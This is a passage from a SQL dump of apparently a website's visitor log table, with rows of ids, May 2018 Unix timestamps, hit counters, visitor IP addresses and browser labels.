46','other'),(251745,1527601789,1,1,0,0,'91.196.177.15','chrome'),(251746,1527601953,1,1,0,0,'5.58.42.137','firefox'),(251747,1527602054,1,1,0,0,'54.36.148.37','other'),(251748,1527602136,2,2,0,0,'80.91.176.159','chrome'),(251749,1527602139,1,1,0,0,'54.36.148.34','other'),(251750,1527602156,2,2,0,0,'94.153.229.229','chrome'),(251751,1527602472,2,2,0,0,'185.212.251.165','chrome'),(251752,1527603076,1,1,0,0,'8.29.198.25','other'),(251753,1527603150,1,1,0,0,'54.36.149.61','other'),(251754,1527603341,2,2,0,0,'216.244.66.241','other'),(251755,1527603440,1,1,0,0,'54.36.148.255','other'),(251756,1527603663,1,1,0,0,'54.36.148.55','other'),(251757,1527603770,1,0,1,0,'66.249.64.30',''),(251758,1527603978,1,1,0,0,'54.36.148.36','other'),(251759,1527604372,1,1,0,0,'188.230.43.254','other'),(251760,1527604444,1,1,0,0,'95.163.255.99','other'),(251761,1527604447,1,1,0,0,'95.163.255.93','other'),(251762,1527604676,1,1,0,0,'216.244.66.241','other'),(251763,1527604686,1,1,0,0,'54.36.148.143','other'),(251764,1527604822,1,1,0,0,'178.154.171.88','other'),(251765,1527604920,2,2,0,0,'91.196.178.27','chrome'),(251766,1527604976,1,1,0,0,'54.36.149.92','other'),(251767,1527605018,1,1,0,0,'54.36.148.10','other'),(251768,1527605086,1,1,0,0,'54.36.148.66','other'),(251769,1527605095,1,1,0,0,'37.9.113.182','other'),(251770,1527605193,2,2,0,0,'141.8.142.74','other'),(251771,1527605288,1,1,0,0,'54.36.148.248','other'),(251772,1527605334,1,1,0,0,'54.36.148.67','other'),(251773,1527605368,2,2,0,0,'82.53.65.193','other'),(251774,1527605920,1,0,1,0,'66.249.70.25',''),(251775,1527606294,1,1,0,0,'188.230.43.254','other'),(251776,1527606371,2,2,0,0,'216.244.66.241','other'),(251777,1527606451,1,1,0,0,'62.205.134.182','msie'),(251778,1527606484,1,1,0,0,'54.36.148.38','other'),(251780,1527606828,1,1,0,0,'188.163.2.30','other'),(251781,1527607115,1,1,0,0,'157.55.39.248','other'),(251782,1527607227,1,1,0,0,'54.36.148.188','other'),(251783,1527607418,1,1,0,0,'54.36.148.76','other'),(251784,1527607524,1,0,1,0,'66.249.70.29',''),(251785,1527607698,1,1,0,0,'157.55.39.69','other'),(251786,1527607868,2,0,2,0,'66.249.70.27',''),(251787,1527608326,1,1,0,0,'54.36.148.134','other'),(251788,1527608507,1,1,0,0,'91.196.178.84','firefox'),(251789,1527608511,1,1,0,0,'95.163.255.9','other'),(251790,1527608564,1,1,0,0,'8.29.198.27','other'),(251791,1527608577,1,1,0,0,'188.230.43.254','other'),(251792,1527608613,1,1,0,0,'216.244.66.241','other'),(251793,1527608957,1,1,0,0,'54.36.148.46','other'),(251794,1527609536,1,1,0,0,'54.36.148.28','other'),(251795,1527609729,1,1,0,0,'54.36.149.16','other'),(251796,1527609841,1,1,0,0,'54.36.149.84','other'),(251797,1527609963,1,1,0,0,'54.36.148.214','other'),(251798,1527610052,1,1,0,0,'54.36.148.219','other'),(251799,1527610150,1,1,0,0,'69.171.240.22','other'),(251800,1527610551,1,1,0,0,'54.36.149.40','other'),(251801,1527610633,1,1,0,0,'54.36.148.222','other'),(251802,1527610968,1,1,0,0,'188.230.43.254','other'),(251803,1527611209,1,1,0,0,'66.249.70.29','chrome'),(251804,1527611631,1,1,0,0,'37.115.139.212','other'),(251805,1527611906,1,1,0,0,'54.36.148.56','other'),(251806,1527611981,1,1,0,0,'54.36.148.50','other'),(251807,1527612560,2,2,0,0,'216.244.66.241','other'),(251808,1527612577,1,0,1,0,'66.249.70.27',''),(251809,1527612762,1,1,0,0,'157.55.39.69','other'),(251810,1527612872,1,1,0,0,'37.9.113.157','other'),(251811,1527612888,1,1,0,0,'54.36.149.83','other'),(251812,1527613078,2,2,0,0,'54.36.148.91','other'),(251813,1527613125,1,1,0,0,'54.36.148.226','other'),(251814,1527613242,1,1,0,0,'54.36.148.150','other'),(251815,1527613311,1,1,0,0,'54.36.148.183','other'),(251816,1527613374,1,1,0,0,'188.230.43.254','other'),(251817,1527613402,1,1,0,0,'178.154.171.88','other'),(251818,1527613422,1,1,0,0,'54.36.149.14','other'),(251819,1527613591,1,1,0,0,'54.36.149.60','other'),(251820,1527613913,1,1,0,0,'8.29.198.27','other'),(251821,1527613947,1,1,0,0,'54.36.148.119','other'),(251822,1527613988,1,1,0,0,'95.163.255.9','other'),(251823,1527613989,1,1,0,0,'216.244.66.241','other'),(251824,1527614135,1,1,0,0,'91.196.178.77','chrome'),(251825,1527614828,1,1,0,0,'54.36.148.115','other'),(251826,1527615202,1,1,0,0,'157.55.39.172','other'),(251827,1527615210,1,1,0,0,'37.52.17.26','other'),(251828,1527615356,1,1,0,0,'54.36.149.79','other'),(251829,1527615399,1,1,0,0,'54.36.149.62','other'),(251830,1527615416,1,1,0,0,'193.106.30.99','firefox'),(251831,1527615785,1,1,0,0,'54.36.148.181','other'),(251832,1527615878,1,1,0,0,'157.55.39.248','other'),(251833,1527616149,1,1,0,0,'54.36.148.167','other'),(251834,1527616535,1,1,0,0,'178.154.171.88','other'),(251835,1527616688,1,1,0,0,'216.244.66.241','other'),(251836,1527616723,2,2,0,0,'195.10.210.49','chrome'),(251837,1527617129,2,2,0,0,'141.8.142.74','other'),(251838,1527617290,1,1,0,0,'91.196.178.57','chrome'),(251839,1527617488,1,1,0,0,'54.36.148.213','other'),(251840,1527617837,1,1,0,0,'54.36.149.10','other'),(251841,1527617965,3,3,0,0,'216.244.66.241','other'),(251842,1527618104,1,1,0,0,'54.36.148.87','other'),(251843,1527618273,1,1,0,0,'54.36.149.61','other'),(251844,1527618924,1,1,0,0,'54.165.59.7','other'),(251845,1527619126,1,1,0,0,'91.196.178.69','other'),(251846,1527619243,2,2,0,0,'216.244.66.241','other'),(251847,1527619288,1,1,0,0,'54.36.148.56','other'),(251848,1527619416,1,1,0,0,'8.29.198.25','other'),(251849,1527619638,1,0,1,0,'66.249.70.29',''),(251850,1527619772,1,1,0,0,'54.36.149.81','other'),(251851,1527619776,1,1,0,0,'141.8.142.74','other'),(251852,1527620189,1,1,0,0,'54.36.148.96','other'),(251853,1527620205,1,1,0,0,'95.163.255.7','other'),(251854,1527620246,1,1,0,0,'216.244.66.241','other'),(251855,1527620415,1,1,0,0,'54.36.148.185','other'),(251856,1527620533,1,1,0,0,'54.36.148.79','other'),(251857,1527620729,1,1,0,0,'46.200.111.147','chrome'),(251858,1527620988,1,1,0,0,'95.158.54.150','other'),(251859,1527621134,2,2,0,0,'91.196.178.165','chrome'),(251860,1527621293,1,1,0,0,'54.36.148.238','other'),(251861,1527621545,1,1,0,0,'54.36.149.72','other'),(251862,1527621765,1,1,0,0,'54.36.149.100','other'),(251863,1527621804,1,1,0,0,'54.36.148.164','other'),(251864,1527621957,1,1,0,0,'54.36.148.92','other'),(251865,1527622037,1,1,0,0,'176.8.245.114','chrome'),(251866,1527622067,1,1,0,0,'54.36.148.105','other'),(251867,1527622154,1,1,0,0,'54.36.148.235','other'),(251868,1527622877,1,1,0,0,'193.194.127.219','chrome'),(251869,1527623062,1,1,0,0,'54.36.148.160','other'),(251870,1527623245,1,1,0,0,'141.8.142.74','other'),(251871,1527623401,1,0,1,0,'66.249.70.25',''),(251872,1527623622,1,1,0,0,'54.36.148.193','other'),(251873,1527623674,1,1,0,0,'51.15.209.146','firefox'),(251874,1527623858,1,1,0,0,'54.36.149.87','other'),(251875,1527624030,1,1,0,0,'54.36.148.65','other'),(251876,1527624399,1,1,0,0,'77.111.247.45','chrome'),(251877,1527624527,1,1,0,0,'141.8.142.74','other'),(251878,1527624748,1,1,0,0,'8.29.198.26','other'),(251879,1527624922,1,1,0,0,'54.36.148.174','other'),(251880,1527625483,1,1,0,0,'91.196.178.167','chrome'),(251881,1527625495,1,1,0,0,'192.162.140.143','firefox'),(251882,1527625543,1,1,0,0,'54.36.148.252','other'),(251883,1527625712,1,1,0,0,'141.8.142.74','other'),(251884,1527626061,1,1,0,0,'54.36.148.156','other'),(251885,1527626172,1,1,0,0,'54.36.148.30','other'),(251886,1527626356,1,1,0,0,'91.196.178.131','chrome'),(251887,1527626413,1,1,0,0,'216.244.66.241','other'),(251888,1527626637,1,1,0,0,'178.154.171.88','other'),(251889,1527626798,1,1,0,0,'54.36.148.11','other'),(251890,1527627421,1,1,0,0,'54.36.149.48','other'),(251891,1527627749,1,1,0,0,'54.36.148.191','other'),(251892,1527628202,1,1,0,0,'141.8.142.74','other'),(251893,1527628530,1,1,0,0,'91.196.177.33','other'),(251894,1527629120,1,1,0,0,'54.36.148.181','other'),(251895,1527629329,1,1,0,0,'54.36.149.38','other'),(251896,1527629807,1,1,0,0,'157.55.39.172','other'),(251897,1527629852,1,1,0,0,'54.36.148.126','other'),(251898,1527630175,1,1,0,0,'54.36.148.181','other'),(251899,1527630260,1,1,0,0,'8.29.198.27','other'),(251900,1527630290,1,1,0,0,'54.36.148.101','other'),(251901,1527630401,1,1,0,0,'54.36.148.174','other'),(251902,1527630568,1,1,0,0,'178.154.171.88','other'),(251903,1527630943,1,0,1,0,'66.249.64.30',''),(251904,1527631141,1,1,0,0,'87.250.224.46','other'),(251905,1527631310,1,1,0,0,'54.36.149.70','other'),(251906,1527631698,1,1,0,0,'54.36.148.159','other'),(251907,1527631736,1,1,0,0,'54.36.148.218','other'),(251908,1527631946,1,1,0,0,'66.249.70.27','chrome'),(251909,1527631978,1,1,0,0,'54.36.148.186','other'),(251910,1527631995,1,1,0,0,'54.36.148.244','other'),(251911,1527632025,1,1,0,0,'216.244.66.241','other'),(251912,1527632290,1,1,0,0,'54.36.148.114','other'),(251913,1527632659,1,1,0,0,'54.36.148.20','other'),(251914,1527632682,1,1,0,0,'37.73.137.66','other'),(251915,1527632836,1,1,0,0,'54.36.148.219','other'),(251916,1527632862,1,1,0,0,'193.106.30.99','firefox'),(251917,1527633186,1,1,0,0,'54.36.148.201','other'),(251918,1527633460,1,1,0,0,'54.36.149.65','other'),(251919,1527633618,1,1,0,0,'54.36.149.33','other'),(251920,1527633672,1,1,0,0,'54.36.149.1','other'),(251921,1527633974,1,1,0,0,'54.36.148.69','other'),(251922,1527633988,1,1,0,0,'66.249.70.27','chrome'),(251923,1527634719,1,1,0,0,'54.36.148.125','other'),(251924,1527635005,1,1,0,0,'141.8.142.74','other'),(251925,1527635332,1,1,0,0,'157.55.39.190','other'),(251926,1527635428,1,1,0,0,'54.36.148.93','other'),(251927,1527635550,1,1,0,0,'54.36.148.250','other'),(251928,1527635579,1,1,0,0,'8.29.198.27','other'),(251929,1527635677,1,1,0,0,'54.36.148.230','other'),(251930,1527635944,1,1,0,0,'54.36.149.7','other'),(251931,1527636055,1,1,0,0,'54.36.148.57','other'),(251932,1527636138,1,1,0,0,'95.163.255.2','other'),(251933,1527636369,1,1,0,0,'54.36.148.129','other'),(251934,1527636423,1,1,0,0,'66.102.9.25','chrome'),(251935,1527636697,1,1,0,0,'54.36.149.87','other'),(251936,1527637178,2,2,0,0,'54.165.59.7','other'),(251937,1527637218,1,1,0,0,'54.36.148.208','other'),(251938,1527638204,1,1,0,0,'54.36.148.41','other'),(251939,1527638400,1,1,0,0,'54.36.148.12','other'),(251940,1527638754,1,1,0,0,'54.36.148.234','other'),(251941,1527639076,1,1,0,0,'54.36.148.70','other'),(251942,1527639663,1,1,0,0,'199.58.86.211','other'),(251943,1527639926,1,1,0,0,'54.36.148.173','other'),(251944,1527639961,1,1,0,0,'54.36.149.85','other'),(251945,1527640084,1,1,0,0,'54.36.148.175','other'),(251946,1527640440,1,1,0,0,'128.69.180.48','msie'),(251947,1527640516,1,1,0,0,'180.76.15.29','other'),(251948,1527640960,1,1,0,0,'66.249.64.28','chrome'),(251949,1527640975,1,1,0,0,'54.36.148.42','other'),(251950,1527641114,1,1,0,0,'8.29.198.25','other'),(251951,1527641765,1,1,0,0,'54.36.148.187','other'),(251952,1527642001,1,1,0,0,'54.36.149.55','other'),(251953,1527643131,2,2,0,0,'54.36.149.91','other'),(251954,1527643541,1,1,0,0,'95.163.255.4','other'),(251955,1527643618,1,1,0,0,'54.36.148.57','other'),(251956,1527643931,1,1,0,0,'212.124.114.242','firefox'),(251957,1527644534,1,1,0,0,'54.36.149.82','other'),(251958,1527644767,1,1,0,0,'54.36.149.58','other'),(251959,1527644800,1,1,0,0,'95.163.255.96','other'),(251960,1527644961,1,1,0,0,'95.163.255.92','other'),(251961,1527645365,1,1,0,0,'54.36.148.200','other'),(251962,1527645808,1,1,0,0,'54.36.148.139','other'),(251963,1527645879,1,1,0,0,'178.92.248.255','chrome'),(251964,1527646086,1,1,0,0,'66.249.70.29','chrome'),(251965,1527646411,1,1,0,0,'8.29.198.27','other'),(251966,1527646423,1,1,0,0,'54.165.59.7','other'),(251967,1527646735,1,1,0,0,'54.36.148.86','other'),(251968,1527646895,1,1,0,0,'54.36.149.23','other'),(251969,1527647510,1,1,0,0,'54.36.148.28','other'),(251970,1527647585,1,1,0,0,'54.36.148.121','other'),(251971,1527647690,1,1,0,0,'54.36.148.35','other'),(251972,1527647894,1,1,0,0,'54.36.149.23','other'),(251973,1527648020,1,1,0,0,'95.163.255.3','other'),(251974,1527648436,1,0,1,0,'66.249.70.25',''),(251975,1527648605,1,1,0,0,'54.36.149.19','other'),(251976,1527648653,1,1,0,0,'54.36.148.114','other'),(251977,1527648778,1,1,0,0,'54.36.148.165','other'),(251978,1527650086,1,1,0,0,'54.36.148.123','other'),(251979,1527650087,1,1,0,0,'91.196.178.168','other'),(251980,1527650127,1,1,0,0,'54.36.148.249','other'),(251981,1527651516,1,1,0,0,'157.55.39.69','other'),(251982,1527651615,1,1,0,0,'193.106.30.99','firefox'),(251983,1527651917,1,1,0,0,'54.36.148.237','other'),(251984,1527651955,1,1,0,0,'8.29.198.25','other'),(251985,1527652181,1,1,0,0,'80.93.187.57','firefox'),(251986,1527652705,1,1,0,0,'54.36.148.39','other'),(251987,1527652784,1,1,0,0,'54.36.148.227','other'),(251988,1527653211,1,1,0,0,'54.36.148.18','other'),(251989,1527653399,1,1,0,0,'54.36.148.101','other'),(251990,1527653749,1,1,0,0,'54.36.148.120','other'),(251991,1527653961,1,0,1,0,'66.249.70.29',''),(251992,1527654019,1,1,0,0,'54.36.149.36','other'),(251993,1527654338,1,1,0,0,'54.36.149.94','other'),(251994,1527654613,1,1,0,0,'216.244.66.241','other'),(251995,1527654634,1,1,0,0,'54.36.148.153','other'),(251996,1527655018,1,0,1,0,'66.249.70.25',''),(251997,1527655104,5,5,0,0,'95.216.5.160','other'),(251998,1527655186,1,1,0,0,'54.36.148.133','other'),(251999,1527655396,1,1,0,0,'54.36.148.103','other'),(252000,1527655683,1,1,0,0,'54.36.148.99','other'),(252001,1527655808,1,1,0,0,'54.36.148.70','other'),(252002,1527656549,1,1,0,0,'54.36.148.144','other'),(252003,1527656849,1,0,1,0,'66.249.64.30',''),(252004,1527657246,1,1,0,0,'8.29.198.26','other'),(252005,1527657361,1,1,0,0,'188.230.43.254','other'),(252007,1527657407,1,1,0,0,'128.69.204.188','msie'),(252008,1527657680,1,1,0,0,'54.36.148.134','other'),(252009,1527657711,1,1,0,0,'46.133.174.182','other'),(252010,1527657926,1,1,0,0,'95.163.255.2','other'),(252011,1527658652,1,0,1,0,'66.249.64.30',''),(252012,1527658795,1,1,0,0,'176.113.209.232','chrome'),(252013,1527658873,1,1,0,0,'54.36.148.94','other'),(252014,1527658888,1,1,0,0,'54.36.148.229','other'),(252015,1527659045,1,1,0,0,'37.55.77.44','chrome'),(252016,1527659334,2,2,0,0,'92.113.60.127','firefox'),(252017,1527659358,1,1,0,0,'54.36.148.85','other'),(252018,1527659363,1,0,1,0,'66.249.70.27',''),(252019,1527659462,1,1,0,0,'37.73.143.62','other'),(252020,1527659829,1,1,0,0,'54.36.148.64','other'),(252021,1527659860,2,2,0,0,'91.196.178.169','chrome'),(252022,1527660116,1,1,0,0,'54.36.148.141','other'),(252023,1527660459,1,1,0,0,'54.36.149.60','other'),(252024,1527660670,1,1,0,0,'95.134.74.240','chrome'),(252025,1527660819,2,2,0,0,'216.244.66.241','other'),(252026,1527660878,1,1,0,0,'54.36.149.91','other'),(252027,1527661048,1,1,0,0,'54.36.148.106','other'),(252028,1527661049,2,2,0,0,'91.196.178.132','chrome'),(252029,1527661593,1,1,0,0,'54.36.148.61','other'),(252030,1527661765,1,1,0,0,'54.36.148.64','other'),(252031,1527662171,2,2,0,0,'91.196.178.93','chrome'),(252032,1527662790,1,1,0,0,'8.29.198.27','other'),(252033,1527662939,1,1,0,0,'54.36.148.150','other'),(252034,1527663322,1,1,0,0,'91.196.177.46','chrome'),(252035,1527663332,1,1,0,0,'95.133.199.144','opera'),(252036,1527663335,1,1,0,0,'77.111.247.48','chrome'),(252037,1527663487,1,1,0,0,'95.134.74.240','chrome'),(252038,1527663489,1,1,0,0,'54.36.148.121','other'),(252039,1527663834,1,1,0,0,'141.8.142.74','other'),(252040,1527664153,1,1,0,0,'54.36.149.15','other'),(252041,1527664170,2,2,0,0,'216.244.66.241','other'),(252042,1527664300,3,3,0,0,'91.196.178.161','chrome'),(252043,1527664541,1,1,0,0,'54.36.148.237','other'),(252044,1527664757,2,2,0,0,'91.196.178.102','chrome'),(252045,1527665223,1,1,0,0,'54.36.148.111','other'),(252046,1527665395,1,1,0,0,'216.244.66.241','other'),(252047,1527665416,1,1,0,0,'204.79.180.13','msie'),(252048,1527665526,1,1,0,0,'91.196.178.93','chrome'),(252049,1527665533,1,1,0,0,'82.146.56.121','msie'),(252050,1527665830,1,1,0,0,'54.36.148.90','other'),(252051,1527667132,1,1,0,0,'91.196.178.102','chrome'),(252052,1527667344,1,1,0,0,'31.43.31.137','chrome'),(252053,1527667362,1,1,0,0,'54.36.148.66','other'),(252054,1527667706,1,1,0,0,'95.134.74.240','chrome'),(252055,1527667871,1,1,0,0,'54.36.149.86','other'),(252056,1527668074,1,1,0,0,'8.29.198.26','other'),(252057,1527668498,1,1,0,0,'54.36.149.31','other'),(252058,1527668746,1,1,0,0,'54.36.148.83','other'),(252059,1527668836,1,1,0,0,'216.244.66.241','other'),(252060,1527668867,1,1,0,0,'54.36.149.22','other'),(252061,1527669276,1,1,0,0,'141.8.142.74','other'),(252062,1527669903,1,1,0,0,'77.111.247.53','chrome'),(252063,1527670110,1,1,0,0,'54.36.148.152','other'),(252064,1527670155,2,2,0,0,'216.244.66.241','other'),(252065,1527670175,1,1,0,0,'54.36.149.52','other'),(252066,1527670311,1,1,0,0,'54.36.149.32','other'),(252067,1527670480,1,1,0,0,'178.154.171.88','other'),(252068,1527670484,1,1,0,0,'87.250.224.46','other'),(252069,1527670608,1,1,0,0,'92.112.125.243','chrome'),(252070,1527670652,1,1,0,0,'54.36.149.105','other'),(252071,1527670885,1,1,0,0,'95.135.217.149','chrome'),(252072,1527671631,2,2,0,0,'91.196.178.69','chrome'),(252073,1527671808,1,1,0,0,'54.36.149.101','other'),(252074,1527671810,1,1,0,0,'54.36.148.139','other'),(252075,1527671819,1,1,0,0,'91.196.178.136','firefox'),(252076,1527672045,1,1,0,0,'180.76.15.18','other'),(252077,1527672090,1,1,0,0,'54.36.148.83','other'),(252078,1527672253,1,1,0,0,'54.165.59.7','other'),(252079,1527672948,1,1,0,0,'180.76.15.134','other'),(252080,1527673067,1,1,0,0,'54.36.148.226','other'),(252081,1527673079,1,1,0,0,'54.36.148.89','other'),(252082,1527673100,3,3,0,0,'141.8.142.74','other'),(252083,1527673557,1,1,0,0,'185.176.109.204','chrome'),(252084,1527673579,1,1,0,0,'54.165.59.7','other'),(252085,1527673630,1,1,0,0,'8.29.198.26','other'),(252086,1527673857,1,1,0,0,'54.36.148.106','other'),(252087,1527674146,1,1,0,0,'46.133.7.154','chrome'),(252088,1527674669,1,1,0,0,'54.36.148.211','other'),(252089,1527674674,1,1,0,0,'54.36.148.164','other'),(252090,1527674830,1,1,0,0,'54.36.149.33','other'),(252091,1527674959,1,1,0,0,'54.36.148.196','other'),(252092,1527675344,2,2,0,0,'216.244.66.241','other'),(252093,1527675362,1,1,0,0,'54.36.148.122','other'),(252094,1527676433,1,1,0,0,'95.163.255.3','other'),(252095,1527676743,2,2,0,0,'95.132.32.83','firefox'),(252096,1527676979,1,1,0,0,'54.36.149.94','other'),(252097,1527678042,2,2,0,0,'216.244.66.241','other'),(252098,1527678110,1,1,0,0,'193.110.18.54','chrome'),(252099,1527678141,1,1,0,0,'54.36.148.198','other'),(252100,1527678267,3,3,0,0,'141.8.142.74','other'),(252101,1527678297,2,2,0,0,'178.154.171.88','other'),(252102,1527678301,1,1,0,0,'54.36.148.36','other'),(252103,1527678382,1,1,0,0,'54.36.148.13','other'),(252104,1527678925,1,1,0,0,'8.29.198.27','other'),(252105,1527679559,2,2,0,0,'91.196.178.90','chrome'),(252106,1527679571,1,1,0,0,'54.36.148.188','other'),(252107,1527679636,1,1,0,0,'54.36.148.145','other'),(252108,1527679704,1,1,0,0,'176.123.220.182','chrome'),(252109,1527679925,1,1,0,0,'54.36.149.37','other'),(252110,1527679975,1,1,0,0,'193.106.30.99','firefox'),(252111,1527680011,2,2,0,0,'91.196.178.93','chrome'),(252112,1527680326,1,1,0,0,'54.36.148.169','other'),(252113,1527680356,1,1,0,0,'108.59.8.80','other'),(252114,1527680379,1,1,0,0,'91.196.178.74','firefox'),(252115,1527680412,2,2,0,0,'188.163.2.30','other'),(252116,1527680518,1,1,0,0,'54.36.148.113','other'),(252117,1527680531,1,1,0,0,'54.36.148.18','other'),(252118,1527680847,1,1,0,0,'54.36.148.139','other'),(252119,1527680944,1,1,0,0,'207.46.13.169','other'),(252120,1527681462,1,1,0,0,'95.163.255.4','other'),(252121,1527681502,3,3,0,0,'91.196.178.161','chrome'),(252122,1527681627,1,1,0,0,'66.249.64.28','chrome'),(252123,1527682336,1,1,0,0,'54.36.148.138','other'),(252124,1527682343,1,1,0,0,'95.133.199.144','opera'),(252125,1527682591,1,1,0,0,'95.135.217.149','chrome'),(252126,1527682735,1,1,0,0,'54.36.149.18','other'),(252127,1527682823,1,1,0,0,'54.36.149.0','other'),(252128,1527682917,1,1,0,0,'66.249.64.29','chrome'),(252129,1527683017,1,1,0,0,'54.36.148.178','other'),(252130,1527683034,1,1,0,0,'91.196.178.74','firefox'),(252131,1527683043,2,2,0,0,'91.196.178.69','chrome'),(252132,1527683161,1,1,0,0,'54.36.148.127','other'),(252133,1527683481,1,1,0,0,'188.163.2.30','other'),(252134,1527683700,1,0,1,0,'66.249.64.28',''),(252135,1527683795,1,1,0,0,'216.244.66.241','other'),(252136,1527683827,1,0,1,0,'66.249.70.29',''),(252137,1527684476,1,1,0,0,'8.29.198.25','other'),(252138,1527684658,1,1,0,0,'54.36.149.71','other'),(252139,1527684926,2,2,0,0,'91.196.178.161','chrome'),(252140,1527685000,1,1,0,0,'54.36.149.37','other'),(252141,1527685129,1,1,0,0,'54.36.148.129','other'),(252142,1527685658,1,1,0,0,'91.209.11.236','other'),(252143,1527686038,1,1,0,0,'54.36.149.98','other'),(252144,1527686191,1,1,0,0,'178.251.107.35','chrome'),(252145,1527686247,1,1,0,0,'37.54.41.252','chrome'),(252146,1527686408,1,1,0,0,'54.36.148.96','other'),(252147,1527686429,2,2,0,0,'91.196.178.169','chrome'),(252148,1527686438,2,2,0,0,'91.196.178.161','chrome'),(252149,1527686490,1,1,0,0,'47.97.209.38','other'),(252150,1527686752,1,1,0,0,'54.36.149.70','other'),(252151,1527687117,1,1,0,0,'188.163.2.30','other'),(252152,1527687212,1,1,0,0,'141.8.142.74','other'),(252153,1527687372,1,1,0,0,'207.46.13.169','other'),(252154,1527687386,1,1,0,0,'157.55.39.69','other'),(252155,1527688100,1,1,0,0,'54.36.148.190','other'),(252156,1527688585,4,4,0,0,'91.196.178.14','chrome'),(252157,1527688778,2,2,0,0,'91.196.178.69','chrome'),(252158,1527688787,1,1,0,0,'178.154.171.88','other'),(252159,1527688791,1,1,0,0,'141.8.142.74','other'),(252160,1527688838,1,1,0,0,'95.163.255.95','other'),(252161,1527688843,1,1,0,0,'54.36.148.110','other'),(252162,1527689113,1,1,0,0,'54.36.148.31','other'),(252163,1527689139,1,1,0,0,'216.244.66.241','other'),(252164,1527689365,1,1,0,0,'80.240.128.62','chrome'),(252165,1527689771,1,1,0,0,'8.29.198.26','other'),(252166,1527689863,1,1,0,0,'95.163.255.94','other'),(252167,1527690470,2,2,0,0,'216.244.66.241','other'),(252168,1527690847,1,1,0,0,'54.36.149.17','other'),(252169,1527691463,1,1,0,0,'54.36.148.105','other'),(252170,1527691752,1,1,0,0,'54.36.148.124','other'),(252171,1527691769,1,1,0,0,'54.36.148.191','other'),(252172,1527691799,2,2,0,0,'141.8.142.74','other'),(252173,1527691985,1,1,0,0,'54.36.149.99','other'),(252174,1527692486,1,1,0,0,'216.244.66.241','other'),(252175,1527692514,1,1,0,0,'178.154.171.88','other'),(252176,1527692606,1,1,0,0,'54.36.148.85','other'),(252177,1527693042,1,1,0,0,'54.36.148.189','other'),(252178,1527693188,1,1,0,0,'180.169.191.142','chrome'),(252179,1527693288,1,1,0,0,'54.36.148.89','other'),(252180,1527693458,1,1,0,0,'54.36.149.84','other'),(252181,1527693556,1,1,0,0,'54.36.148.49','other'),(252182,1527693569,1,1,0,0,'54.36.148.29','other'),(252183,1527693638,1,1,0,0,'54.36.148.199','other'),(252184,1527693831,1,1,0,0,'54.36.149.75','other'),(252185,1527693912,1,1,0,0,'54.36.148.164','other'),(252186,1527694069,1,1,0,0,'54.36.148.244','other'),(252187,1527694804,1,1,0,0,'54.36.148.177','other'),(252188,1527695314,1,1,0,0,'8.29.198.27','other'),(252189,1527695498,1,1,0,0,'180.76.15.134','other'),(252190,1527695840,1,1,0,0,'188.163.2.30','other'),(252191,1527695940,1,1,0,0,'54.36.149.60','other'),(252192,1527696018,1,1,0,0,'54.36.148.195','other'),(252193,1527696162,1,1,0,0,'180.76.15.151','other'),(252194,1527696204,1,1,0,0,'54.36.148.186','other'),(252195,1527696247,1,1,0,0,'54.36.148.161','other'),(252196,1527696265,1,1,0,0,'54.36.148.96','other'),(252197,1527696841,1,0,1,0,'79.3.69.168',''),(252198,1527696924,2,2,0,0,'54.36.148.41','other'),(252199,1527696927,1,1,0,0,'54.36.148.91','other'),(252200,1527697136,1,1,0,0,'54.36.149.102','other'),(252201,1527697242,1,1,0,0,'54.36.148.183','other'),(252202,1527697542,1,1,0,0,'54.36.149.93','other'),(252203,1527698027,1,1,0,0,'141.8.142.74','other'),(252204,1527698084,2,2,0,0,'37.55.225.161','chrome'),(252205,1527698178,1,1,0,0,'54.36.148.160','other'),(252206,1527698305,1,1,0,0,'54.36.149.91','other'),(252207,1527698314,1,1,0,0,'188.230.43.254','other'),(252208,1527698322,1,1,0,0,'91.196.178.75','firefox'),(252209,1527698681,1,1,0,0,'54.36.149.33','other'),(252210,1527698945,1,1,0,0,'54.36.148.20','other'),(252211,1527698996,1,1,0,0,'54.36.148.35','other'),(252212,1527699215,1,1,0,0,'54.36.148.241','other'),(252213,1527699398,1,1,0,0,'54.36.149.29','other'),(252214,1527699420,1,1,0,0,'157.55.39.190','other'),(252215,1527699779,1,1,0,0,'54.36.148.132','other'),(252216,1527699783,1,1,0,0,'213.180.203.40','other'),(252217,1527699809,1,1,0,0,'54.36.148.77','other'),(252218,1527699990,1,1,0,0,'54.36.148.215','other'),(252219,1527700284,1,1,0,0,'91.196.178.38','chrome'),(252220,1527700311,1,1,0,0,'54.36.149.45','other'),(252221,1527700470,1,1,0,0,'66.249.64.14','chrome'),(252222,1527700608,1,1,0,0,'8.29.198.27','other'),(252223,1527700646,1,1,0,0,'5.45.207.58','other'),(252224,1527700660,1,1,0,0,'54.36.148.134','other'),(252225,1527700715,1,1,0,0,'188.230.43.254','other'),(252226,1527700803,1,1,0,0,'54.36.149.73','other'),(252227,1527701227,1,1,0,0,'54.36.149.95','other'),(252228,1527701310,1,1,0,0,'157.55.39.69','other'),(252229,1527701352,1,1,0,0,'54.36.148.117','other'),(252230,1527701393,1,1,0,0,'54.36.148.206','other'),(252231,1527702440,1,1,0,0,'54.36.148.172','other'),(252232,1527702488,1,1,0,0,'54.36.148.65','other'),(252233,1527702883,1,1,0,0,'109.86.147.1','chrome'),(252234,1527703122,1,1,0,0,'188.230.43.254','other'),(252235,1527703135,1,1,0,0,'54.36.148.39','other'),(252236,1527703152,1,1,0,0,'180.76.15.24','other'),(252237,1527703186,1,1,0,0,'54.36.149.33','other'),(252238,1527703704,1,1,0,0,'141.8.142.74','other'),(252239,1527703830,1,1,0,0,'54.36.149.11','other'),(252240,1527703984,1,1,0,0,'54.36.148.206','other'),(252241,1527704016,1,1,0,0,'54.36.149.34','other'),(252242,1527704302,1,1,0,0,'66.249.64.30','chrome'),(252243,1527704337,1,1,0,0,'66.249.64.28','chrome'),(252244,1527704402,1,1,0,0,'54.36.149.81','other'),(252245,1527704457,1,1,0,0,'54.36.149.86','other'),(252246,1527704497,1,1,0,0,'54.36.148.250','other'),(252247,1527704692,1,1,0,0,'54.36.148.238','other'),(252248,1527704852,1,1,0,0,'54.36.148.46','other'),(252249,1527705452,1,1,0,0,'54.36.148.29','other'),(252250,1527705910,1,1,0,0,'54.36.148.100','other'),(252251,1527706177,1,1,0,0,'8.29.198.26','other'),(252252,1527706270,1,1,0,0,'95.163.255.98','other'),(252253,1527706302,2,2,0,0,'46.211.134.148','chrome'),(252254,1527706867,2,2,0,0,'91.196.178.167','chrome'),(252255,1527706915,1,1,0,0,'54.36.148.204','other'),(252256,1527707126,1,1,0,0,'141.8.142.74','other'),(252257,1527707222,1,1,0,0,'54.36.148.185','other'),(252258,1527707513,1,1,0,0